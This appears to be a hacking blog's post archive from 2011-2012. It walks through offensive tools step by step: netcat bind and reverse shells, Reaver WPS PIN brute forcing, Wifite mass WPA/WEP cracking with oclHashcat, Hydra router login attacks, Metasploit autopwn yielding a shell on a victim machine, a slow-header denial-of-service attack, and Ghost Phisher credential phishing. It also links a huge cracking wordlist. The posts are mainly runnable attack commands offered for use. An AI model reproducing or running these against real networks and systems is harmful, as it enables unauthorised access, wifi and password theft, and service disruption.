Posts mit dem Label Backtrack werden angezeigt. Alle Posts anzeigen
Posts mit dem Label Backtrack werden angezeigt. Alle Posts anzeigen
Mittwoch, 8. August 2012
HexorBase - The Database Hacker Tool - MySql, Oracle, PostgreSQL, SQLlite, MS-Sql
HexorBase - The Database Hacker Tool ( MySql, Oracle, PostgreSQL, SQLlite, MS-Sql )
HexorBase is a database application designed for administering and auditing multiple database servers simultaneously from a centralized location, it is capable of performing SQL queries and bruteforce attacks against common database servers (MySQL, SQLite, Microsoft SQL Server, Oracle, PostgreSQL ).HexorBase allows packet routing through proxies or even metasploit pivoting antics to communicate with remotely inaccessible servers which are hidden within local subnets.
It works on Linux and Windows running the following:
Requirements:
python
python-qt4
cx_Oracle
python-mysqldb
python-psycopg2
python-pymssql
python-qscintilla2
To install simply run the following command in terminal after changing directory to the path were the downloaded package is:
root@host:~# dpkg -i hexorbase_1.0_all.deb
Icons and Running the application:
Software Icon can be found at the application Menu of the GNOME desktop interfaces
Icon can also be found at /usr/share/applications for KDE and also GNOME:
There you find "HexorBase.desktop"
To get the source code for this project from SVN, here's the checkout link:
root@host:~# svn checkout http://hexorbase.googlecode.com/svn/
Freitag, 27. Januar 2012
Netcat HowTo Banner Grabbing, Bind Shell, Reverse Shell and Webserver
Netcat HowTo Banner Grabbing, Bind Shell, Reverse Shell and Webserver
Netcat is a computer networking service for reading from and writing network connections using TCP or UDP. Netcat is designed to be a dependable "back-end" device that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool, since it can produce almost any kind of correlation you would need and has a number of built-in capabilities
Although NetCat is not the state of the art tool anymore and it sends all packets uncrypted through the net, it´s still a very good tool for easy banner grabbing, binding shells or reverse shells.
Banner Grabbing Commandline:
nc -v 192.168.0.200 21
nslookup -querytype=mx debian.org
nc -v xxx.debian.org 25
nslookup -querytype=mx dell.com
nc -v xxx.dell.com 25
nc -v 192.168.0.200 80
GET / HTTP/1.1
nc -v www.dell.com 80
GET / HTTP/1.1
nc -v 192.168.0.200 21
Weberserver Commandline:
while true; do nc -l -p 80 -q 1 < bla.html; done
File Transfer Commandline:
windows maschine file server nc -lvp 4444 > captured.txt
linux maschine: nc -v target-ip < info.txt this cmd will send the content of the file INFO.TXT to the Server into the file CAPTURED.TXT
Shell Commandlines:
Bind Shell
windows maschine: nc -lvp 4444 -e cmd.exe
linux maschine: nc -v 192.168.0.200 4444
Connecting from the linux system to the windows system,
which isn´t located behind a NAT System.
Reverse Shell
windows maschine: nc -lvp 4444
linux maschine: nc -nv 192.168.0.200 4444 -e /bin/bash
/sbin/ifconfig
Sending a /bin/bash Shell from a Linux system behind a NAT to the
windows system, which is listening on port 4444. traversing NAT.
Montag, 23. Januar 2012
Fully Automated Mass WPA / WEP Hacker with Wifite ( wifite.py ) and cracking key with oclHashcat
Fully Automated Mass WPA / WEP Hacking with Wifite ( wifite.py )
converting the .cap File and resolving the WPA Key with oclHashcat-64
In this Tutorial you learn how to Capture a WPA2 Handshake with a GUI Powered Tool ( wifite.py );
later we upload the capture file to http://hashcat.net/cap2hccap/ to generate a .hccap file which we will crack with oclHashCat-64.
Some Informations about the Tools:
Wifite:
This project is available in French: all thanks goto Matt² for his excellent translation!
sorts targets by power (in dB); cracks closest access points first
automatically deauths clients of hidden networks to decloak SSIDs
numerous filters to specify exactly what to attack (wep/wpa/both, above certain signal strengths, channels, etc)
customizable settings (timeouts, packets/sec, channel, change mac address, ignore fake-auth, etc)
"anonymous" feature; changes MAC to a random address before attacking, then changes back when attacks are complete
all WPA handshakes are backed up to wifite.py's current directory
smart WPA deauthentication -- cycles between all clients and broadcast deauths
stop any attack with Ctrl+C -- options: continue, move onto next target, skip to cracking, or exit
switching WEP attack methods does not reset IVs
intel 4965 chipset fake-authentication support; uses wpa_supplicant workaround
SKA support (untested)
displays session summary at exit; shows any cracked keys
all passwords saved to log.txt
built-in updater: ./wifite.py -upgrade
Requirements
linux operating system (confirmed working on Ubuntu 8.10 (BT4R1), Ubuntu 10.04.1)
tested working with python 2.4.5 and python 2.5.2; might be compatible with other versions,
wireless drivers patched for monitor mode and injection: backtrack4 has many pre-patched drivers,
aircrack-ng (v1.1) suite: available via apt: apt-get install aircrack-ng or by clicking here,
xterm, python-tk module: required for GUI, available via apt: apt-get install python-tk
macchanger: also available via apt: apt-get install macchanger
pyrit: not required, optionally strips wpa handshake from .cap files
oclHashcat-plus
Worlds fastest md5crypt, phpass, mscash2 and WPA / WPA2 cracker
Worlds first and only GPGPU based rule engine
Free
Multi-GPU (up to 16 gpus)
Multi-Hash (up to 24 million hashes)
Multi-OS (Linux & Windows native binaries)
Multi-Platform (OpenCL & CUDA support)
Multi-Algo (see below)
Low resource utilization, you can still watch movies or play games while cracking
Focuses highly iterated, modern hashes
Focuses single dictionary based attacks
Supports pause / resume while cracking
Supports reading words from file
Supports reading words from stdin
Integrated thermal watchdog
20+ Algorithms implemented with performance in mind
If you have any question, leave a note.
Samstag, 21. Januar 2012
Reaver 1.4 WPS Bruteforcing Tool - Upgrade/Installation/Usage
Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations. Reaver implements a brute force attack against Wifi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases
On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase.
Prerequisites
You must be running Linux
You must have a wireless card capable of raw injection
You must put your wireless card into monitor mode. This is most easily done using airmon-ng from the aircrack-ng tool suite.
Basic Usage
First, make sure your wireless card is in monitor mode:
# airmon-ng start wlan0
Then Start ./wash -i mon0 to scan for valid Wifis.
To run Reaver, you must specify the BSSID of the target AP and the name of the monitor mode interface (usually 'mon0', not 'wlan0', although this will vary based on your wireless card/drivers):
# reaver -i mon0 -b 00:01:02:03:04:05
You will probably also want to use -vv to get verbose info about Reaver's progress:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv
Speeding Up the Attack
By default, Reaver has a 1 second delay between pin attempts. You can disable this delay by adding '-d 0' on the command line, but some APs may not like it:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0
Samstag, 7. Januar 2012
UPDATE: The BEST Dictionaries & Wordlist for WPA Cracking
This is a 18 in 1 WPA Edition Password List, its not only a combination of Passwords:
- Merged each 'collection' into one file (minus the 'readmes' files)
- Removed leading & trailing spaces & tabs
- Converted all 'new lines' to 'Unix' format
- Removed non-printable characters
- Removed HTML tags (Complete and common incomplete tags)
- Removed (common domains) email addresses
- Removed duplicate entries
- How much would be used if they were for 'cracking WPA' (Between 8-63 characters)
All the Credits for the work go to g0tmi1k !!! Visit his Site for closer Informations !
Download Full 18in1 cleaned Password List:
Compressed 4,8GB ( 24 Files, 7-Zip ) / Extracted 39,1GB ( 1 File, .lst )
UPDATE FROM: 07.08.2012
https://app.dumptruck.goldenfrog.com/p/O10ZURAU91
Use this Download Link ONLY!
Password: maurisdump.blogspot.com
This Collection was used to create the 18in1 WPA Edition:
http://www.skullsecurity.org/wiki/index.php/Passwords
http://trac.kismac-ng.org/wiki/wordlists
http://hashcrack.blogspot.com/p/wordlist-downloads_29.html
http://packetstormsecurity.org/Crackers/wordlists/
http://0x80.org/wordlist/
http://dictionary-thesaurus.com/wordlists.html
http://www.outpost9.com/files/WordLists.html
http://www.openwall.com/passwords/wordlists/
http://dictionary-thesaurus.com/Wordlists.html
http://en.wikipedia.org/wiki/Wikipedia_database
http://blog.sebastien.raveau.name/2009/03/cracking-passwords-with-wikipedia.html
http://www.isdpodcast.com/resources/62k-common-passwords/
http://trac.kismac-ng.org/wiki/wordlists
http://hashcrack.blogspot.com/p/wordlist-downloads_29.html
http://packetstormsecurity.org/Crackers/wordlists/
http://0x80.org/wordlist/
http://dictionary-thesaurus.com/wordlists.html
http://www.outpost9.com/files/WordLists.html
http://www.openwall.com/passwords/wordlists/
http://dictionary-thesaurus.com/Wordlists.html
http://en.wikipedia.org/wiki/Wikipedia_database
http://blog.sebastien.raveau.name/2009/03/cracking-passwords-with-wikipedia.html
http://www.isdpodcast.com/resources/62k-common-passwords/
Montag, 2. Januar 2012
Router Hacking with Hydra - Very Fast
Update: New Video Version
In this short video you can see how effectiv hydra/xhydra works with a passwordlist against routers,
weblogins and other authentication forms.
THC-Hydra - the best parallized login hacker:
- Samba, FTP, POP3,
- IMAP, Telnet, HTTP Auth,
- LDAP,NNTP, MySQL, VNC,
- ICQ, Socks5, PCNFS,
- Cisco and more. Includes SSL support and is part of Nessus.
Samstag, 31. Dezember 2011
Automated Mass WPA / WEP Hacker with Wifite ( wifite.py )
NEW VIDEO - NEW VIDEO - NEW VIDEO - NEW VIDEO - NEW VIDEO
The Purpose is to attack multiple WEP and WPA encrypted networks at the same time. this tool is customizable to be automated with only a few arguments.
Features:
- sorts targets by power (in dB); cracks closest access points first
- automatically deauths clients of hidden networks to decloak SSIDs
- numerous filters to specify exactly what to attack (wep/wpa/both, above certain signal strengths, channels, etc)
- customizable settings (timeouts, packets/sec, channel, change mac address, ignore fake-auth, etc)
- "anonymous" feature; changes MAC to a random address before attacking, then changes back when attacks are complete
- all WPA handshakes are backed up to wifite.py's current directory
- smart WPA deauthentication -- cycles between all clients and broadcast deauths
- stop any attack with Ctrl+C -- options: continue, move onto next target, skip to cracking, or exit
- switching WEP attack methods does not reset IVs
- intel 4965 chipset fake-authentication support; uses wpa_supplicant workaround
- SKA support (untested)
- displays session summary at exit; shows any cracked keys
- all passwords saved to log.txt
- built-in updater: ./wifite.py -upgrade
Freitag, 30. Dezember 2011
SIOCSIFFLAGS: Unknown error 132 message
If you are using Backtrack 5 or Backtrack 5 R1 within a Vmware while using USB Wifi Devices like the RTL8187 Chipset ( ALFA AWUS 036H ) you run probably into this Error Message:
airmon-ng start wlan0
SIOCSIFFLAGS: Unknown error 132 message
To solve this issue, use the following commands:
prepare-kernel-sources
cd /usr/src/linux/drivers/net/wireless/rtl818x/rtl8187/
wget http://backtrack-linux.org/silly-rfkill-patch.patch
patch -p0 < silly-rfkill-patch.patch
cd /usr/src/linux
make drivers/net/wireless/rtl818x/rtl8187/rtl8187.ko
cp drivers/net/wireless/rtl818x/rtl8187/rtl8187.ko /lib/modules/2.6.39.4/kernel/drivers
/net/wireless/rtl818x/rtl8187/rtl8187.ko
After that reboot your vmware/backtrack, and your issue is solved.
airmon-ng start wlan0
SIOCSIFFLAGS: Unknown error 132 message
To solve this issue, use the following commands:
prepare-kernel-sources
cd /usr/src/linux/drivers/net/wireless/rtl818x/rtl8187/
wget http://backtrack-linux.org/silly-rfkill-patch.patch
patch -p0 < silly-rfkill-patch.patch
cd /usr/src/linux
make drivers/net/wireless/rtl818x/rtl8187/rtl8187.ko
cp drivers/net/wireless/rtl818x/rtl8187/rtl8187.ko /lib/modules/2.6.39.4/kernel/drivers
/net/wireless/rtl818x/rtl8187/rtl8187.ko
After that reboot your vmware/backtrack, and your issue is solved.
Reaver 1.2 WPS Brute Force Cracker to recover Passphrase
NEW VIDEO - NEW VIDEO
http://maurisdump.blogspot.com/2012/01/reaver-14-wps-bruteforcing-tool-upgrade.html
Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations. Reaver implements a brute force attack against Wifi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases
On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase.
Prerequisites
You must be running Linux
You must have a wireless card capable of raw injection
You must put your wireless card into monitor mode. This is most easily done using airmon-ng from the aircrack-ng tool suite.
Basic Usage
First, make sure your wireless card is in monitor mode:
# airmon-ng start wlan0
To run Reaver, you must specify the BSSID of the target AP and the name of the monitor mode interface (usually 'mon0', not 'wlan0', although this will vary based on your wireless card/drivers):
# reaver -i mon0 -b 00:01:02:03:04:05
You will probably also want to use -vv to get verbose info about Reaver's progress:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv
Speeding Up the Attack
By default, Reaver has a 1 second delay between pin attempts. You can disable this delay by adding '-d 0' on the command line, but some APs may not like it:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0
Montag, 26. Dezember 2011
How to Convert your.cap File to hccap for use with oclHashCat for WPA
http://hashcat.net/cap2hccap/
Then use oclhashcat-plus to crack it, command for using with ATI GPU´s:
Open a Dosbox, use the following cmd-line:
C:\oclHashcat-plus-0.06\oclHashcat-plus64.exe -m 2500 D:\oclHashcat-plus-0.06\1.hccap D:\oclHashcat-plus-0.06\wpa.txt
- -m 2500 -> defines that we want to crack a WPA file
- wpa.txt -> your Dictionarie / Wordlist File
Note:
If you encounter difficulties regarding the opencl.dll, just download the latest ATI Catalyst Drivers and select the ATI SDK and install it, works without a reboot.
Samstag, 24. Dezember 2011
Strip WPA2 Handshake with Wireshark
How to Strip your Handshake with Wireshark:
- Open your Capture in Wireshark
- Enter "eapol || wlan.fc.type_subtype == 0x04 || wlan.fc.type_subtype == 0x08" as filter expression (without quotes) then press "Apply"
- Go to File -> Save As... Menu, Enter new File name and select "Displayed" to save filtered packets only.
Dienstag, 13. Dezember 2011
Easy Apache / IIS Slow Header Attack
Slow Header Attack
The Slow Header attack works by exploiting the Client idle timeout value on the server side. This timeout is configured on server side to drop a client connection if a client was found idle during the time interval. The Slow header attack finds the approximate timeout value set in Server side and then chooses a value which is lower than the configured value. The attack then initiates a Http Request with Partial header to the server. It keeps sending one header based on the chosen value and this way Client idle timeout will not be triggered on the server side and Request will not be complete
In essence you can send a Denial Of Service attack to website using one laptop over a proxy.
How to own a Windows XP SP3 Box with Metasploit / Backtrack.
Tutorial: Metasploit DB Autopwning
Commands:
/etc/init.d/postgresql-8.3 start # start the database
msfconsole # start metasploit
db_connect pentest # connect to database
db_nmap HOST IP/ HOSTNAME # Scan for open Ports
db_autopwnage -e -p # -e = All matched Targets, # -p = Select Attacks based on open Ports
Wait until a Meterpreter Session, like:
*] Meterpreter session 1 opened (10.0.0.128:44919 - 10.0.0.130:33411)
Wait until the Attack is over or STRG+C to Terminate the Attack.
Now:
Sessions # shows your connects to the victim
Session -i 1 # you join session 1
shell # opens reverse shell on victim
Use the help function, to get information about other available commands.
FOR EDUCATIONAL PURPOSES ONLY
Phishing Attacks with GUI powered Ghost Phisher Fake DNS, Fake DHCP, Fake Webserver
Phishing Attacks with GUI powered Ghost Phisher Fake DNS, Fake DHCP, Fake Webserver
Ghost Phisher is a computer security application that comes inbuilt with a Fake DNS Server, Fake DHCP Server, Fake HTTP server and also has an integrated area for automatic capture and logging of HTTP form method credentials to a database. The program could be used as an honey pot , could be used to service DHCP request , DNS requests or phishing attacks.
Abonnieren
Posts (Atom)
